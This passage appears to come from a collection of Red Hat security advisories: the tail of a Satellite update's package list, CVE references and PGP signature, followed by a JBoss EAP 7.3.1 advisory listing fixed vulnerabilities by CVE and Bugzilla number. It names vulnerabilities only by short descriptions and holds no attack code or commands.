tfm-rubygem-declarative-option-0.1.0-1.el7sat.noarch.rpm tfm-rubygem-deep_cloneable-3.0.0-3.el7sat.noarch.rpm tfm-rubygem-deface-1.5.3-2.el7sat.noarch.rpm tfm-rubygem-diffy-3.0.1-6.el7sat.noarch.rpm tfm-rubygem-domain_name-0.5.20160310-4.el7sat.noarch.rpm tfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-erubi-1.9.0-1.el7sat.noarch.rpm tfm-rubygem-excon-0.58.0-3.el7sat.noarch.rpm tfm-rubygem-execjs-2.7.0-4.el7sat.noarch.rpm tfm-rubygem-faraday-0.15.4-1.el7sat.noarch.rpm tfm-rubygem-faraday-cookie_jar-0.0.6-1.el7sat.noarch.rpm tfm-rubygem-faraday_middleware-0.13.1-2.el7sat.noarch.rpm tfm-rubygem-fast_gettext-1.4.1-3.el7sat.noarch.rpm tfm-rubygem-fog-aws-3.6.5-1.el7sat.noarch.rpm tfm-rubygem-fog-core-2.1.0-3.el7sat.noarch.rpm tfm-rubygem-fog-google-1.8.2-1.el7sat.noarch.rpm tfm-rubygem-fog-json-1.2.0-3.el7sat.noarch.rpm tfm-rubygem-fog-kubevirt-1.3.3-1.el7sat.noarch.rpm tfm-rubygem-fog-libvirt-0.7.0-1.el7sat.noarch.rpm tfm-rubygem-fog-openstack-1.0.8-2.el7sat.noarch.rpm tfm-rubygem-fog-ovirt-1.2.5-1.el7sat.noarch.rpm tfm-rubygem-fog-vsphere-3.3.1-1.el7sat.noarch.rpm tfm-rubygem-fog-xml-0.1.2-8.el7sat.noarch.rpm tfm-rubygem-foreman-tasks-2.0.2-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.noarch.rpm tfm-rubygem-foreman_ansible-5.1.3-1.el7sat.noarch.rpm tfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.noarch.rpm tfm-rubygem-foreman_azure_rm-2.1.2-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-foreman_bootdisk-17.0.2-2.fm2_1.el7sat.noarch.rpm tfm-rubygem-foreman_discovery-16.1.2-1.el7sat.noarch.rpm tfm-rubygem-foreman_hooks-0.3.16-2.el7sat.noarch.rpm tfm-rubygem-foreman_kubevirt-0.1.7-1.el7sat.noarch.rpm tfm-rubygem-foreman_leapp-0.1.6-1.el7sat.noarch.rpm tfm-rubygem-foreman_openscap-4.0.3-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-foreman_remote_execution-3.3.7-1.el7sat.noarch.rpm tfm-rubygem-foreman_remote_execution-cockpit-3.3.7-1.el7sat.noarch.rpm tfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.noarch.rpm tfm-rubygem-foreman_rh_cloud-2.0.12-1.el7sat.noarch.rpm tfm-rubygem-foreman_templates-9.0.1-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-foreman_theme_satellite-6.0.1.7-1.el7sat.noarch.rpm tfm-rubygem-foreman_virt_who_configure-0.5.2-1.el7sat.noarch.rpm tfm-rubygem-formatador-0.2.1-11.el7sat.noarch.rpm tfm-rubygem-friendly_id-5.3.0-1.el7sat.noarch.rpm tfm-rubygem-fx-0.5.0-1.el7sat.noarch.rpm tfm-rubygem-get_process_mem-0.2.1-3.el7sat.noarch.rpm tfm-rubygem-gettext-3.1.4-10.el7sat.noarch.rpm tfm-rubygem-gettext_i18n_rails-1.8.0-1.el7sat.noarch.rpm tfm-rubygem-git-1.5.0-1.el7sat.noarch.rpm tfm-rubygem-gitlab-sidekiq-fetcher-0.5.2-2.el7sat.noarch.rpm tfm-rubygem-globalid-0.4.2-1.el7sat.noarch.rpm tfm-rubygem-google-api-client-0.23.9-3.el7sat.noarch.rpm tfm-rubygem-googleauth-0.6.7-3.el7sat.noarch.rpm tfm-rubygem-graphql-1.8.14-1.el7sat.noarch.rpm tfm-rubygem-graphql-batch-0.3.10-1.el7sat.noarch.rpm tfm-rubygem-gssapi-1.2.0-6.el7sat.noarch.rpm tfm-rubygem-hammer_cli-2.1.2-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman-2.1.2.1-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_admin-0.0.9-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_ansible-0.3.2-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_azure_rm-0.2.0-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_bootdisk-0.3.0-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_discovery-1.0.2-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_docker-0.0.6.4-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_kubevirt-0.1.4-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_leapp-0.1.0-2.fm2_1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_openscap-0.1.11-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_remote_execution-0.1.2-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_tasks-0.0.14-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_templates-0.2.0-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_virt_who_configure-0.0.6-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_katello-0.22.2.2-1.el7sat.noarch.rpm tfm-rubygem-hashie-3.6.0-1.el7sat.noarch.rpm tfm-rubygem-highline-1.7.8-4.el7sat.noarch.rpm tfm-rubygem-http-3.3.0-1.el7sat.noarch.rpm tfm-rubygem-http-cookie-1.0.2-5.el7sat.noarch.rpm tfm-rubygem-http-form_data-2.1.1-1.el7sat.noarch.rpm tfm-rubygem-httpclient-2.8.3-1.el7sat.noarch.rpm tfm-rubygem-i18n-1.8.2-1.el7sat.noarch.rpm tfm-rubygem-infoblox-3.0.0-3.el7sat.noarch.rpm tfm-rubygem-ipaddress-0.8.0-11.el7sat.noarch.rpm tfm-rubygem-jgrep-1.3.3-12.el7sat.noarch.rpm tfm-rubygem-journald-logger-2.0.4-2.el7sat.noarch.rpm tfm-rubygem-jwt-2.2.1-1.el7sat.noarch.rpm tfm-rubygem-kafo-4.1.0-3.el7sat.noarch.rpm tfm-rubygem-kafo_parsers-1.1.0-3.el7sat.noarch.rpm tfm-rubygem-kafo_wizards-0.0.1-4.el7sat.noarch.rpm tfm-rubygem-katello-3.16.0.11-1.el7sat.noarch.rpm tfm-rubygem-kubeclient-4.3.0-1.el7sat.noarch.rpm tfm-rubygem-ldap_fluff-0.4.7-5.el7sat.noarch.rpm tfm-rubygem-little-plugger-1.1.4-1.el7sat.noarch.rpm tfm-rubygem-locale-2.0.9-13.el7sat.noarch.rpm tfm-rubygem-logging-2.2.2-6.el7sat.noarch.rpm tfm-rubygem-logging-journald-2.0.0-2.el7sat.noarch.rpm tfm-rubygem-loofah-2.4.0-1.el7sat.noarch.rpm tfm-rubygem-mail-2.7.1-1.el7sat.noarch.rpm tfm-rubygem-marcel-0.3.3-1.el7sat.noarch.rpm tfm-rubygem-memoist-0.16.0-1.el7sat.noarch.rpm tfm-rubygem-method_source-0.9.2-2.el7sat.noarch.rpm tfm-rubygem-mime-types-3.2.2-4.el7sat.noarch.rpm tfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.noarch.rpm tfm-rubygem-mimemagic-0.3.5-1.el7sat.noarch.rpm tfm-rubygem-mini_mime-1.0.2-1.el7sat.noarch.rpm tfm-rubygem-mini_portile2-2.4.0-1.el7sat.noarch.rpm tfm-rubygem-ms_rest-0.7.4-2.el7sat.noarch.rpm tfm-rubygem-ms_rest_azure-0.11.1-2.el7sat.noarch.rpm tfm-rubygem-multi_json-1.14.1-1.el7sat.noarch.rpm tfm-rubygem-multipart-post-2.0.0-1.el7sat.noarch.rpm tfm-rubygem-mustermann-1.0.2-4.el7sat.noarch.rpm tfm-rubygem-net-ldap-0.16.1-1.el7sat.noarch.rpm tfm-rubygem-net-ping-2.0.1-3.el7sat.noarch.rpm tfm-rubygem-net-scp-1.2.1-3.el7sat.noarch.rpm tfm-rubygem-net-ssh-4.2.0-1.el7sat.noarch.rpm tfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.noarch.rpm tfm-rubygem-netrc-0.11.0-3.el7sat.noarch.rpm tfm-rubygem-oauth-0.5.4-3.el7sat.noarch.rpm tfm-rubygem-openscap-0.4.9-3.el7sat.noarch.rpm tfm-rubygem-optimist-3.0.0-1.el7sat.noarch.rpm tfm-rubygem-os-1.0.0-1.el7sat.noarch.rpm tfm-rubygem-ovirt_provision_plugin-2.0.3-1.el7sat.noarch.rpm tfm-rubygem-parse-cron-0.1.4-4.el7sat.noarch.rpm tfm-rubygem-polyglot-0.3.5-3.el7sat.noarch.rpm tfm-rubygem-powerbar-2.0.1-2.el7sat.noarch.rpm tfm-rubygem-prometheus-client-1.0.0-1.el7sat.noarch.rpm tfm-rubygem-promise.rb-0.7.4-1.el7sat.noarch.rpm tfm-rubygem-public_suffix-3.0.3-1.el7sat.noarch.rpm tfm-rubygem-pulp_2to3_migration_client-0.2.0-0.1.b6.el7sat.noarch.rpm tfm-rubygem-pulp_ansible_client-0.2.0b13.dev01588546902-1.el7sat.noarch.rpm tfm-rubygem-pulp_certguard_client-0.1.0rc5-1.el7sat.noarch.rpm tfm-rubygem-pulp_container_client-1.4.1-1.el7sat.noarch.rpm tfm-rubygem-pulp_file_client-1.0.1-1.el7sat.noarch.rpm tfm-rubygem-pulp_rpm_client-3.5.0-1.el7sat.noarch.rpm tfm-rubygem-pulpcore_client-3.4.1-1.el7sat.noarch.rpm tfm-rubygem-puma-plugin-systemd-0.1.5-1.el7sat.noarch.rpm tfm-rubygem-quantile-0.2.0-3.el7sat.noarch.rpm tfm-rubygem-rabl-0.14.3-1.el7sat.noarch.rpm tfm-rubygem-rack-2.2.3-1.el7sat.noarch.rpm tfm-rubygem-rack-cors-1.0.2-1.el7sat.noarch.rpm tfm-rubygem-rack-jsonp-1.3.1-9.el7sat.noarch.rpm tfm-rubygem-rack-protection-2.0.3-4.el7sat.noarch.rpm tfm-rubygem-rack-test-1.1.0-4.el7sat.noarch.rpm tfm-rubygem-rails-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-rails-dom-testing-2.0.3-6.el7sat.noarch.rpm tfm-rubygem-rails-html-sanitizer-1.3.0-1.el7sat.noarch.rpm tfm-rubygem-rails-i18n-6.0.0-2.el7sat.noarch.rpm tfm-rubygem-railties-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-rainbow-2.2.1-5.el7sat.noarch.rpm tfm-rubygem-rb-inotify-0.9.7-5.el7sat.noarch.rpm tfm-rubygem-rbovirt-0.1.7-4.el7sat.noarch.rpm tfm-rubygem-rbvmomi-2.2.0-3.el7sat.noarch.rpm tfm-rubygem-record_tag_helper-1.0.1-3.el7sat.noarch.rpm tfm-rubygem-recursive-open-struct-1.1.0-1.el7sat.noarch.rpm tfm-rubygem-redhat_access-2.2.18-1.el7sat.noarch.rpm tfm-rubygem-redhat_access_lib-1.1.5-1.el7sat.noarch.rpm tfm-rubygem-redis-4.1.2-2.el7sat.noarch.rpm tfm-rubygem-representable-3.0.4-1.el7sat.noarch.rpm tfm-rubygem-responders-3.0.0-3.el7sat.noarch.rpm tfm-rubygem-rest-client-2.0.2-3.el7sat.noarch.rpm tfm-rubygem-retriable-3.1.2-1.el7sat.noarch.rpm tfm-rubygem-roadie-3.4.0-3.el7sat.noarch.rpm tfm-rubygem-roadie-rails-2.1.1-2.el7sat.noarch.rpm tfm-rubygem-robotex-1.0.0-21.el7sat.noarch.rpm tfm-rubygem-rsec-0.4.3-4.el7sat.noarch.rpm tfm-rubygem-ruby2ruby-2.4.2-3.el7sat.noarch.rpm tfm-rubygem-ruby_parser-3.10.1-2.el7sat.noarch.rpm tfm-rubygem-rubyipmi-0.10.0-6.el7sat.noarch.rpm tfm-rubygem-runcible-2.13.0-2.el7sat.noarch.rpm tfm-rubygem-safemode-1.3.5-2.el7sat.noarch.rpm tfm-rubygem-scoped_search-4.1.9-1.el7sat.noarch.rpm tfm-rubygem-secure_headers-6.3.0-2.el7sat.noarch.rpm tfm-rubygem-sequel-5.7.1-2.el7sat.noarch.rpm tfm-rubygem-sexp_processor-4.10.0-5.el7sat.noarch.rpm tfm-rubygem-sidekiq-5.2.7-3.el7sat.noarch.rpm tfm-rubygem-signet-0.11.0-3.el7sat.noarch.rpm tfm-rubygem-sinatra-2.0.3-4.el7sat.noarch.rpm tfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.noarch.rpm tfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.noarch.rpm tfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.noarch.rpm tfm-rubygem-sprockets-3.7.2-6.el7sat.noarch.rpm tfm-rubygem-sprockets-rails-3.2.1-6.el7sat.noarch.rpm tfm-rubygem-sshkey-1.9.0-3.el7sat.noarch.rpm tfm-rubygem-statsd-instrument-2.1.4-2.el7sat.noarch.rpm tfm-rubygem-stomp-1.4.9-1.el7sat.noarch.rpm tfm-rubygem-text-1.3.0-7.el7sat.noarch.rpm tfm-rubygem-thor-1.0.1-2.el7sat.noarch.rpm tfm-rubygem-thread_safe-0.3.6-5.el7sat.noarch.rpm tfm-rubygem-tilt-2.0.8-4.el7sat.noarch.rpm tfm-rubygem-timeliness-0.3.10-1.el7sat.noarch.rpm tfm-rubygem-tzinfo-1.2.6-1.el7sat.noarch.rpm tfm-rubygem-uber-0.1.0-1.el7sat.noarch.rpm tfm-rubygem-unf-0.1.3-7.el7sat.noarch.rpm tfm-rubygem-unicode-display_width-1.0.5-5.el7sat.noarch.rpm tfm-rubygem-validates_lengths_from_database-0.5.0-7.el7sat.noarch.rpm tfm-rubygem-webpack-rails-0.9.8-6.el7sat.noarch.rpm tfm-rubygem-websocket-extensions-0.1.5-1.el7sat.noarch.rpm tfm-rubygem-will_paginate-3.1.7-3.el7sat.noarch.rpm tfm-rubygem-x-editable-rails-1.5.5-5.el7sat.noarch.rpm tfm-rubygem-xmlrpc-0.3.0-2.el7sat.noarch.rpm tfm-rubygem-zeitwerk-2.2.2-1.el7sat.noarch.rpm
x86_64: createrepo_c-0.7.4-1.el7sat.x86_64.rpm createrepo_c-debuginfo-0.7.4-1.el7sat.x86_64.rpm createrepo_c-libs-0.7.4-1.el7sat.x86_64.rpm foreman-discovery-image-service-1.0.0-3.el7sat.x86_64.rpm foreman-discovery-image-service-tui-1.0.0-3.el7sat.x86_64.rpm hfsplus-tools-332.14-12.el7.x86_64.rpm hfsplus-tools-debuginfo-332.14-12.el7.x86_64.rpm libmodulemd-1.7.0-1.pulp.el7sat.x86_64.rpm libmodulemd-debuginfo-1.7.0-1.pulp.el7sat.x86_64.rpm libsolv-0.7.4-4.pulp.el7sat.x86_64.rpm libsolv-debuginfo-0.7.4-4.pulp.el7sat.x86_64.rpm libwebsockets-2.4.2-2.el7.x86_64.rpm libwebsockets-debuginfo-2.4.2-2.el7.x86_64.rpm livecd-tools-20.4-1.6.el7sat.x86_64.rpm mod_passenger-4.0.18-24.el7sat.x86_64.rpm mod_xsendfile-0.12-11.el7sat.x86_64.rpm mod_xsendfile-debuginfo-0.12-11.el7sat.x86_64.rpm ostree-2017.1-2.atomic.el7.x86_64.rpm ostree-debuginfo-2017.1-2.atomic.el7.x86_64.rpm pcp-mmvstatsd-0.4-2.el7sat.x86_64.rpm puppet-agent-6.14.0-2.el7sat.x86_64.rpm pycairo-1.16.3-9.el7sat.x86_64.rpm pycairo-debuginfo-1.16.3-9.el7sat.x86_64.rpm pygobject3-debuginfo-3.28.3-2.el7sat.x86_64.rpm python-aiohttp-debuginfo-3.6.2-4.el7ar.x86_64.rpm python-billiard-debuginfo-3.5.0.3-3.el7sat.x86_64.rpm python-bson-3.2-2.el7sat.x86_64.rpm python-imgcreate-20.4-1.6.el7sat.x86_64.rpm python-markupsafe-debuginfo-0.23-21.el7sat.x86_64.rpm python-multidict-debuginfo-4.7.4-2.el7ar.x86_64.rpm python-psutil-5.0.1-3.el7sat.x86_64.rpm python-psutil-debuginfo-5.0.1-3.el7sat.x86_64.rpm python-pycurl-debuginfo-7.43.0.2-4.el7sat.x86_64.rpm python-pymongo-3.2-2.el7sat.x86_64.rpm python-pymongo-debuginfo-3.2-2.el7sat.x86_64.rpm python-pymongo-gridfs-3.2-2.el7sat.x86_64.rpm python-qpid-proton-0.28.0-3.el7.x86_64.rpm python-qpid-qmf-1.36.0-28.el7amq.x86_64.rpm python-saslwrapper-0.22-5.el7sat.x86_64.rpm python-simplejson-3.2.0-1.el7sat.x86_64.rpm python-simplejson-debuginfo-3.2.0-1.el7sat.x86_64.rpm python-twisted-debuginfo-16.4.1-12.el7sat.x86_64.rpm python-yarl-debuginfo-1.4.2-2.el7ar.x86_64.rpm python-zope-interface-4.0.5-4.el7.x86_64.rpm python-zope-interface-debuginfo-4.0.5-4.el7.x86_64.rpm python2-billiard-3.5.0.3-3.el7sat.x86_64.rpm python2-gobject-3.28.3-2.el7sat.x86_64.rpm python2-gobject-base-3.28.3-2.el7sat.x86_64.rpm python2-markupsafe-0.23-21.el7sat.x86_64.rpm python2-pycurl-7.43.0.2-4.el7sat.x86_64.rpm python2-solv-0.7.4-4.pulp.el7sat.x86_64.rpm python2-twisted-16.4.1-12.el7sat.x86_64.rpm python3-aiohttp-3.6.2-4.el7ar.x86_64.rpm python3-multidict-4.7.4-2.el7ar.x86_64.rpm python3-yarl-1.4.2-2.el7ar.x86_64.rpm qpid-cpp-client-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-client-devel-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-debuginfo-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-server-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-server-linearstore-1.36.0-28.el7amq.x86_64.rpm qpid-dispatch-debuginfo-1.5.0-4.el7.x86_64.rpm qpid-dispatch-router-1.5.0-4.el7.x86_64.rpm qpid-proton-c-0.28.0-3.el7.x86_64.rpm qpid-proton-debuginfo-0.28.0-3.el7.x86_64.rpm qpid-qmf-1.36.0-28.el7amq.x86_64.rpm rh-postgresql12-postgresql-evr-0.0.2-1.el7sat.x86_64.rpm rubygem-facter-2.4.1-2.el7sat.x86_64.rpm rubygem-newt-0.9.6-3.el7sat.x86_64.rpm rubygem-newt-debuginfo-0.9.6-3.el7sat.x86_64.rpm rubygem-passenger-4.0.18-24.el7sat.x86_64.rpm rubygem-passenger-debuginfo-4.0.18-24.el7sat.x86_64.rpm rubygem-passenger-native-4.0.18-24.el7sat.x86_64.rpm rubygem-passenger-native-libs-4.0.18-24.el7sat.x86_64.rpm saslwrapper-0.22-5.el7sat.x86_64.rpm saslwrapper-debuginfo-0.22-5.el7sat.x86_64.rpm tfm-rubygem-bcrypt-3.1.12-1.el7sat.x86_64.rpm tfm-rubygem-bcrypt-debuginfo-3.1.12-1.el7sat.x86_64.rpm tfm-rubygem-facter-2.4.0-6.el7sat.x86_64.rpm tfm-rubygem-ffi-1.12.2-1.el7sat.x86_64.rpm tfm-rubygem-ffi-debuginfo-1.12.2-1.el7sat.x86_64.rpm tfm-rubygem-http_parser.rb-0.6.0-1.el7sat.x86_64.rpm tfm-rubygem-http_parser.rb-debuginfo-0.6.0-1.el7sat.x86_64.rpm tfm-rubygem-journald-native-1.0.11-2.el7sat.x86_64.rpm tfm-rubygem-journald-native-debuginfo-1.0.11-2.el7sat.x86_64.rpm tfm-rubygem-nio4r-2.5.2-2.el7sat.x86_64.rpm tfm-rubygem-nio4r-debuginfo-2.5.2-2.el7sat.x86_64.rpm tfm-rubygem-nokogiri-1.10.9-1.el7sat.x86_64.rpm tfm-rubygem-nokogiri-debuginfo-1.10.9-1.el7sat.x86_64.rpm tfm-rubygem-ovirt-engine-sdk-4.2.3-3.el7sat.x86_64.rpm tfm-rubygem-ovirt-engine-sdk-debuginfo-4.2.3-3.el7sat.x86_64.rpm tfm-rubygem-passenger-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-passenger-debuginfo-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-passenger-native-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-passenger-native-libs-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-pg-1.1.4-2.el7sat.x86_64.rpm tfm-rubygem-pg-debuginfo-1.1.4-2.el7sat.x86_64.rpm tfm-rubygem-puma-4.3.3-4.el7sat.x86_64.rpm tfm-rubygem-puma-debuginfo-4.3.3-4.el7sat.x86_64.rpm tfm-rubygem-rkerberos-0.1.5-18.el7sat.x86_64.rpm tfm-rubygem-rkerberos-debuginfo-0.1.5-18.el7sat.x86_64.rpm tfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.x86_64.rpm tfm-rubygem-ruby-libvirt-debuginfo-0.7.0-4.el7sat.x86_64.rpm tfm-rubygem-sqlite3-1.3.13-5.el7sat.x86_64.rpm tfm-rubygem-sqlite3-debuginfo-1.3.13-5.el7sat.x86_64.rpm tfm-rubygem-unf_ext-0.0.7.2-1.el7sat.x86_64.rpm tfm-rubygem-unf_ext-debuginfo-0.0.7.2-1.el7sat.x86_64.rpm tfm-rubygem-unicode-0.4.4.4-1.el7sat.x86_64.rpm tfm-rubygem-unicode-debuginfo-0.4.4.4-1.el7sat.x86_64.rpm tfm-rubygem-websocket-driver-0.7.1-1.el7sat.x86_64.rpm tfm-rubygem-websocket-driver-debuginfo-0.7.1-1.el7sat.x86_64.rpm tfm-runtime-6.1-1.el7sat.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2018-3258 https://access.redhat.com/security/cve/CVE-2018-11751 https://access.redhat.com/security/cve/CVE-2019-12781 https://access.redhat.com/security/cve/CVE-2019-16782 https://access.redhat.com/security/cve/CVE-2020-5216 https://access.redhat.com/security/cve/CVE-2020-5217 https://access.redhat.com/security/cve/CVE-2020-5267 https://access.redhat.com/security/cve/CVE-2020-7238 https://access.redhat.com/security/cve/CVE-2020-7663 https://access.redhat.com/security/cve/CVE-2020-7942 https://access.redhat.com/security/cve/CVE-2020-7943 https://access.redhat.com/security/cve/CVE-2020-8161 https://access.redhat.com/security/cve/CVE-2020-8184 https://access.redhat.com/security/cve/CVE-2020-8840 https://access.redhat.com/security/cve/CVE-2020-9546 https://access.redhat.com/security/cve/CVE-2020-9547 https://access.redhat.com/security/cve/CVE-2020-9548 https://access.redhat.com/security/cve/CVE-2020-10693 https://access.redhat.com/security/cve/CVE-2020-10968 https://access.redhat.com/security/cve/CVE-2020-10969 https://access.redhat.com/security/cve/CVE-2020-11619 https://access.redhat.com/security/cve/CVE-2020-14061 https://access.redhat.com/security/cve/CVE-2020-14062 https://access.redhat.com/security/cve/CVE-2020-14195 https://access.redhat.com/security/cve/CVE-2020-14334 https://access.redhat.com/security/cve/CVE-2020-14380 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBX5gpEdzjgjWX9erEAQgmXRAAjIzb5ngtDgGHNv75R+NwkGD3jzRe/GfK 1DDrOBxGaminKY9q+hGwwJOGrMbr2gcfu+VtuFgUTaxFjbfml6Lsju9czOPSL+Wa 5vIcvaUObLQEwmW5hP7ZIqzZvm0UlbSgHEsv7tYwIWkITIg54p2fQzRUuSH8nRhr oomd60Mv8Ayv6IdogtiNDdv8B7avsNQrbtzf60HGtyZlX8Rro2Wy8gosbfsGl10f Z8Nc+tVwWdkdpFjcMtwmYIDtecgwxMmo3FMJRtkSrQ2VldZB9mjFj/WyfZOfV3Io OhoAiLFzi52dC68an5/VFnzZWxdOmYjqm4rBZ2MLnw/wn4jH2WOgjK5VBJUW+nmX k9pQLGrKlLQeYSVY9Je9Maxz1POajFEV1u+ByAVDBm1xBJMhlTEcTwbHt1X0jLzG C2CSzCY8Urz2j1SvYrcrBdNGSqK1wvMwDL7V7lEpaFd/dGE+JwbrOB6z2iYr3de5 /6nh/jeWFi16C0Z8FbYe021edVuzbzCITbz+UdThAITmROcE7Q6ysDPcvToANfta D2gChuqVhmTWJ9YDeQTWiErQLY4OJfklPd/5L/sIZqoZpV8B+5bTHTKsCiisyj1a f4PVZiu+CQoxHuj45rTwRLLfP9+SmJpFz+JsId6rKQ2hrzZ4DzB9srzyewd2TfvG 1yK/tAm1KBU=osSG -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
This release of Red Hat JBoss Enterprise Application Platform 7.3.1 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.3.0, and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 7.3.1 Release Notes for information about the most significant bug fixes and enhancements included in this release.
Security Fix(es):
-
cxf: reflected XSS in the services listing page (CVE-2019-17573)
-
cxf-core: cxf: OpenId Connect token service does not properly validate the clientId (CVE-2019-12423)
-
jackson-mapper-asl: XML external entity similar to CVE-2016-3720 (CVE-2019-10172)
-
undertow: servletPath in normalized incorrectly leading to dangerous application mapping which could result in security bypass (CVE-2020-1757)
-
jackson-databind: XML external entity similar to CVE-2016-3720 (CVE-2019-10172)
-
jackson-mapper-asl: XML external entity similar to CVE-2016-3720 (CVE-2019-10172)
-
resteasy-jaxrs: resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class (CVE-2020-1695)
-
cryptacular: excessive memory allocation during a decode operation (CVE-2020-7226)
-
smallrye-config: SmallRye: SecuritySupport class is incorrectly public and contains a static method to access the current threads context class loader (CVE-2020-1729)
-
resteasy: RESTEASY003870 exception in RESTEasy can lead to a reflected XSS attack (CVE-2020-10688)
-
jackson-databind: Lacks certain xbean-reflect/JNDI blocking (CVE-2020-8840)
-
undertow: invalid HTTP request with large chunk size (CVE-2020-10719)
-
jackson-databind: Serialization gadgets in shaded-hikari-config (CVE-2020-9546)
-
jackson-databind: Serialization gadgets in ibatis-sqlmap (CVE-2020-9547)
-
jackson-databind: Serialization gadgets in anteros-core (CVE-2020-9548)
-
undertow: AJP File Read/Inclusion Vulnerability (CVE-2020-1745)
-
libthrift: thrift: Endless loop when feed with specific input data (CVE-2019-0205)
-
libthrift: thrift: Out-of-bounds read related to TJSONProtocol or TSimpleJSONProtocol (CVE-2019-0210)
-
wildfly: The 'enabled-protocols' value in legacy security is not respected if OpenSSL security provider is in use (CVE-2019-14887)
-
jsf-impl: Mojarra: Path traversal via either the loc parameter or the con parameter, incomplete fix of CVE-2018-14371 (CVE-2020-6950)
-
jsf-impl: mojarra: Path traversal in ResourceManager.java:getLocalePrefix() via the loc parameter (CVE-2018-14371)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, see the CVE page(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):
1607709 - CVE-2018-14371 mojarra: Path traversal in ResourceManager.java:getLocalePrefix() via the loc parameter 1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720 1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class 1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass 1764607 - CVE-2019-0210 thrift: Out-of-bounds read related to TJSONProtocol or TSimpleJSONProtocol 1764612 - CVE-2019-0205 thrift: Endless loop when feed with specific input data 1772008 - CVE-2019-14887 wildfly: The 'enabled-protocols' value in legacy security is not respected if OpenSSL security provider is in use 1797006 - CVE-2019-12423 cxf: OpenId Connect token service does not properly validate the clientId 1797011 - CVE-2019-17573 cxf: reflected XSS in the services listing page 1801380 - CVE-2020-7226 cryptacular: excessive memory allocation during a decode operation 1802444 - CVE-2020-1729 SmallRye: SecuritySupport class is incorrectly public and contains a static method to access the current threads context class loader 1805006 - CVE-2020-6950 Mojarra: Path traversal via either the loc parameter or the con parameter, incomplete fix of CVE-2018-14371 1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability 1814974 - CVE-2020-10688 RESTEasy: RESTEASY003870 exception in RESTEasy can lead to a reflected XSS attack 1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking 1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config 1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap 1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core 1828459 - CVE-2020-10719 undertow: invalid HTTP request with large chunk size
- JIRA issues fixed (https://issues.jboss.org/):
